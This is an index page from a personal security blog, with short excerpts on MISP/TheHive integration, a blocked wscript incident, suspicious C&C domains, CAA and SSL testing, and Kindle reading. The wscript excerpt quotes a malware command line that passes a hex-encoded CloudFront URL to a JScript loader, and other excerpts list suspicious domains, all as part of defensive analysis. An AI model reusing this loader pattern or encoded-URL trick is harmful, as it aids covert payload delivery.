About:me
I’m a dedicated father and friend. I enjoy technology immensely and feel extremely lucky to have been born at the right place & during the right time. I started out working for the University of Dayton as a co-op student in computer science. I fell in love with the concept of networking – this was…
importing wildfire reports into misp and thehive
I’m experimenting with thehive and associated projects (misp in particular) and will be describing some issues I run into & how I’ve fixed them (fingers crossed). One of the first things I tried was to import events from wildfire to misp. I found a package called pan-stix and installed it on my osx box. Running…
Examining strange wscript behavior
We use cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently: wscript.exe “C:ProgramData{18E0DD83-92A2-5745-1464-C9078E2642C9}domo.txt” “68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574” “//B” “//E:jscript” “–IsErIk” I took a copy of the domo.txt script and uploaded to VT: I also ran that hex string through a hex decoder: 68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e = https://d274eq41c39r2n.cloudfront.net According to…
Update: f5d599a39d02caef1984e95fdc606f838893ffc5.xyz
Unfortunately, as of 16 April 2019, I’m still seeing traffic on this domain. Here are some others I’m seeing: dfbfb63dcaff96fbe9616fb806e4799f.com8d46980d994cc618aeed127df1b5c86d8acd86ce.info07bf396c25d9a624281c97752aee0247e4229b84.xyz07bf396c25d9a624281c97752aee0247e4229b84.com07bf396c25d9a624281c97752aee0247e4229b84.infod234304f57772cf6be78ab6c24a65c91ce896fff.xyzd234304f57772cf6be78ab6c24a65c91ce896fff.comd234304f57772cf6be78ab6c24a65c91ce896fff.info8d46980d994cc618aeed127df1b5c86d8acd86ce.xyzcbb0c7dae8061aca012b8a910062c33f3642e383.comcbb0c7dae8061aca012b8a910062c33f3642e383.xyzcbb0c7dae8061aca012b8a910062c33f3642e383.info
Update on f5d599a39d02caef1984e95fdc606f838893ffc5.xyz
I contacted security@nordvpn and they said it will be fixed in the most recent release of NordVPN. As a bonus they gave me 3 years free for reporting the issue 🙂
f5d599a39d02caef1984e95fdc606f838893ffc5.xyz
I’m now the proud owner of these domains: f5d599a39d02caef1984e95fdc606f838893ffc5.com8d46980d994cc618aeed127df1b5c86d8acd86ce.xyz10bdc75ab2f0486f008dbdd8f1b0a38d7399598e.xyz Why would I purchase such strange looking domains you ask? It all started long ago, while working for my enterprise. I saw some activity flagged by OpenDNS / Umbrella for some CnC traffic bound for these domains. It was being blocked but as I dug a…
CAA Test Results
As promised, I’ve been testing Certification Authority Authorization (CAA) with some Certificate Authorities and here’s what I found so far: Amazon Certificate Manager (ACM) It does not appear they honor the IODEF since I didn’t receive an email. Let’s Encrypt appears to also block issuance: Let’s Encrypt (using lego) 2018/12/29 16:44:30 Could not obtain certificates…
Getting to A+ with Qualys
One of the things I do when examining a website is to run it through Qualys’s SSL Labs Server Test. It does not provide a ‘security’ score per-se, but can be a good first step in making sure sessions are end-to-end encrypted between your users & your website. As of 5:23PM on 28 Dec 2018…
How I Read Kindle Books (for free)
A few years ago I read a medium post where the author describes how she reads so much. A big part of her strategy was to use her Amazon Kindle Paperwhite. The device is dedicated to reading (no other apps to distract you), has a great backlit screen, and can be held in almost any…
Loading…
Something went wrong. Please refresh the page and/or try again.
Follow My Blog
Get new content delivered directly to your inbox.